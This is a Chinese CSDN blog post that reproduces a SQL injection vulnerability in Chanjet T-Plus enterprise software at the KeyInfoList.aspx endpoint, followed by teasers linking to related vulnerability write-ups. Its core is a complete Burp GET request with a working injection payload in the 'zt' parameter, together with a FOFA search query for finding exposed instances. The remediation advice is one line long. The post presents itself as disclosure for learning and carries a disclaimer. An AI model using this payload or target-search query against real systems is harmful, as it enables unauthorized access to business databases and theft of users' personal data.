【复现】畅捷通T-Plus SQL注入漏洞_68

最新推荐文章于 2024-10-01 22:57:25 发布
最新推荐文章于 2024-10-01 22:57:25 发布
阅读量767 收藏 8
点赞数 10
分类专栏: 安全漏洞 文章标签: 安全 web安全 系统安全 网络安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fushuang333/article/details/137512181
版权
文章讲述了畅捷T+企业管理系统中发现的SQL注入漏洞,攻击者可窃取用户数据并可能进行非法操作。提供了漏洞复现方法、修复建议以及安全搜索提示,同时强调了免责声明和合法使用的重要性。
摘要由CSDN通过智能技术生成

目录

一.概述

二 .漏洞影响

三.漏洞复现

1. 漏洞一:

四.修复建议:

五. 搜索语法:

六.免责声明

一.概述

畅捷T+是用友畅捷通推出的一款新型互联网企业管理系统,T+能够满足成长型小微企业对其灵活业务流程的管控需求,重点解决往来业务管理、订单跟踪、资金、库存等管理难题。

二 .漏洞影响

        攻击者未经授权可以访问数据库中的数据,盗取用户的隐私以及个人信息,造成用户的信息泄露。 可以对数据库的数据进行增加或删除操作,例如私自添加或删除管理员账号。甚至拿到服务器权限。

三.漏洞复现

1. 漏洞一:

(1)漏洞类型:  SQL注入

(2)请求类型:GET

(3)复现

找到相关系统

请求漏洞点,查看burp响应

burp请求包

GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','1234')))--+ HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

四.修复建议:

对变量做好过滤和检测。

五. 搜索语法:

1.fofa

app="畅捷通-TPlus"

六.免责声明

本文所涉及的任何技术、信息或工具,仅供学习和参考之用。请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

漏洞复现捷通T+ App_Code.ashx 远程命令执行漏洞
alert['Hello World']
06-17 928
捷通T+ Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore 接口存在反序列化漏洞,可导致命令执行。被攻击者利用此漏洞可直接接管服务器。
捷通T+ 反序列化漏洞复现(QVD-2023-13615)
0xSec
06-23 4599
捷通 T+ 存在.net反序列化漏洞,未经过身份认证的攻击者可以通过构造恶意的序列化请求在目标服务器上执行任意命令。
捷通TPlus keyEdit.aspx、KeyInfoList.aspx SQL注入漏洞复现
05-16 553
捷通-TPlus是一个为中小企业设计的财税云服务平台,提供财务、税务管理和发票处理功能,支持低代码开发,帮助企业实现数字化和智能化经营管理。
0x10 用友 捷通T+ RecoverPassword.aspx 管理员密码修改漏洞
最新发布
weixin_43263566的博客
10-01 410
存在未授权管理员密码修改漏洞,攻击者可以通过该漏洞修改管理员账号密码,从而登录后台。使用本博客即表示您同意以上条款。如果有疑问,请联系我。
漏洞复现】用友捷通TPlus InitServerInfo.aspx SQL注入漏洞
https://blog.echo234.cn/
03-25 728
捷通T+专属云适用于需要一体化管理的企业,财务管理、业务管理、零售管理、生产管理、物流管理、移动仓管、营销管理、委外加工等人财货客一体化管理。该系统在InitServerInfo.aspx接口处未对用户的输入进行过滤和校验存在SQL注入漏洞
漏洞复现--用友 捷通T+ .net反序列化RCE
qq_53003652的博客
10-25 1515
捷通T+是一款新型互联网企业管理软件。全面满足成长型小微企业对其灵活业务流程的管控需求,重点解决往来业务管理、订单跟踪、资金、库存等管理难题。该产品存在.net反序列化可导致RCE。访问执行命令的日志文件即test.txt。执行ipconfig /all。此脚本来自揽月安全团队。
漏洞复现】用友-捷通T+-Ufida-SQL注入
知黑而守白
01-22 377
用友捷通 T+是一款基于互联网的新型企业管理软件,功能模块包括:财务管理、采购管理、库存管理等。主要针对中小型工贸和商贸企业的财务业务一体化应用,融入了社交化、移动化、物联网、电子商务、互联网信息订阅等元素。用友捷通 T+某模块存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
捷通T+ SQL注入漏洞复现(QVD-2023-13612)
0xSec
06-14 3942
捷通T+的某后台功能点只校验了权限,未对用户的输入进行过滤,导致在权限绕过后存在SQL注入漏洞,利用此漏洞攻击者最终可以实现远程命令执行。
漏洞复现】用友-捷通T+-SQL注入-keyEdit
知黑而守白
07-05 647
用友捷通 T+是一款基于互联网的新型企业管理软件,功能模块包括:财务管理、采购管理、库存管理等。主要针对中小型工贸和商贸企业的财务业务一体化应用,融入了社交化、移动化、物联网、电子商务、互联网信息订阅等元素。捷通T+ keyEdit.aspx接口存在SQL注入漏洞 ,恶意攻击者可能会利用此漏洞修改数据库中的数据,例如添加、删除或修改记录,导致数据损坏或丢失。
漏洞复现捷通T+ keyEdit SQL注入漏洞
alert['Hello World']
06-17 457
捷通 T+ 是一款基于互联网的新型企业管理软件,功能模块包括:财务管理、采购管理、库存管理等。主要针对中小型工贸和商贸企业的财务业务一体化应用,融入了社交化、移动化、物联网、电子商务、互联网信息订阅等元素。捷通T+ keyEdit,aspx 存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库权限。
捷通T+ KeyInfoList.aspx SQL漏洞复现
0xSec
04-06 547
由于捷通T+的KeyInfoList.aspx接口处未对用户的输入进行过滤和校验,未经身份验证的攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
用友捷通T+ keyEdit sql注入漏洞
Keepb1ue的博客
05-11 644
捷通 T+ 是一款灵动,智慧,时尚的基于互联网时代开发的管理软件,主要针对中小型工贸与商贸企业,尤其适合有异地多组织机构(多工厂,多仓库,多办事处,多经销商)的企业,涵盖了财务,业务,生产等领域的应用,产品应用功能包括:采购管理、库存管理、销售管理、生产管理、分销管理、零售管理、往来管理、现金银行管理、总账、移动应用等,融入了社交化、移动化、电子商务、互联网信息订阅等元素,为企业打造全新的生意模式、管理模式、工作模式。
复现捷通T-Plus SQL注入漏洞_65
fushuang333的博客
03-17 1002
复现捷通T-Plus SQL注入漏洞,​攻击者未经授权可以访问数据库中的数据,盗取用户的隐私以及个人信息,造成用户的信息泄露。
用友-捷通T+-InitServerInfo-SQL注入
weixin_43567873的博客
03-13 100
用友-捷通T+-InitServerInfo-SQL注入
漏洞复现捷通TPlus App_Code.ashx存在远程命令执行漏洞
失心少年
04-19 283
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。漏洞链接:https://127.0.0.1/tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?捷通T+专属云适用于需要一体化管理的企业,财务管理、业务管理、零售管理、生产管理、物流管理、移动仓管、营销管理、委外加工等人财货客一体化管理。
捷通T+SQL注入漏洞
holyxp的博客
07-27 914
捷通 T+ 是一款基于互联网的新型企业管理软件,功能模块包括:财务管理、采购管理、库存管理等。主要针对中小型工贸和商贸企业的财务业务一体化应用,融入了社交化、移动化、物联网、电子商务、互联网信息订阅等元素。捷通T+的某后台功能点只校验了权限,未对用户的输入进行过滤,导致在权限绕过后存在SQL注入漏洞,利用此漏洞攻击者最终可以实现远程命令执行。
漏洞复现】用友捷通T+ SQL注入漏洞
2301_79099363的博客
07-13 1542
漏洞复现】用友捷通T+ SQL注入漏洞
【附攻击载荷】捷通 T+ Ufida.T.SM.UIP.ScheduleManage存在SQL注入漏洞
jijisaq的博客
03-09 680
捷通 T+ 是一款基于互联网的新型企业管理软件,功能模块包括:财务管理、采购管理、库存管理等。主要针对中小型工贸和商贸企业的财务业务一体化应用,融入了社交化、移动化、物联网、电子商务、互联网信息订阅等元素。由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本公众号及作者不为此承担任何责任,一旦造成后果请自行承担!捷通T+的某后台功能点只校验了权限,未对用户的输入进行过滤,导致在权限绕过后存在SQL注入漏洞,利用此漏洞攻击者最终可以实现远程命令执行。
Django SQL注入漏洞复现环境部署
09-20
Django是一个流行的Python web框架,它对SQL注入攻击有一定的防护机制,但如果防护不当或用户输入验证不足,仍可能发生SQL注入复现一个Django SQL注入漏洞的环境通常需要以下几个步骤: 1. **安装Django**:首先确保已经安装了Python和pip,然后通过`pip install django`命令安装最新版本的Django。 2. **创建项目**:运行`django-admin startproject myproject` 创建一个新的Django项目。 3. **创建应用**:在项目目录下,进入`myproject`并创建一个应用,如`cd myproject && python manage.py startapp vulnerable_app`。 4. **模型设计**:在`vulnerable_app/models.py`中创建一个表单或模型接收用户输入,例如: ```python from django.db import models class UserInput(models.Model): user_input = models.CharField(max_length=200) ``` 5. **视图处理**:在`views.py`中编写一个处理用户输入的视图,可能未正确过滤或转义输入,比如: ```python from .models import UserInput def input_view(request): user_input = request.GET.get('input') # 这里假设直接将用户输入插入数据库,未做安全检查 UserInput.objects.create(user_input=user_input) ``` 6. **URL配置**:在`myproject/urls.py`中添加URL映射到上述视图。 7. **启动服务器**:运行`python manage.py runserver`启动Django开发服务器。 8. **尝试注入**:在浏览器中访问`http://localhost:8000/input_view?input=<your-injection>`,其中 `<your-injection>`是你想尝试注入的SQL代码。 复现环境部署后,关键是要注意识别和修复那些可能导致注入的安全漏洞,例如使用`django-filter`、`django-model-utils`等库提供的安全查询替代手动拼接SQL,或始终对用户输入进行适当的清理和验证。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

穿着白衣

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值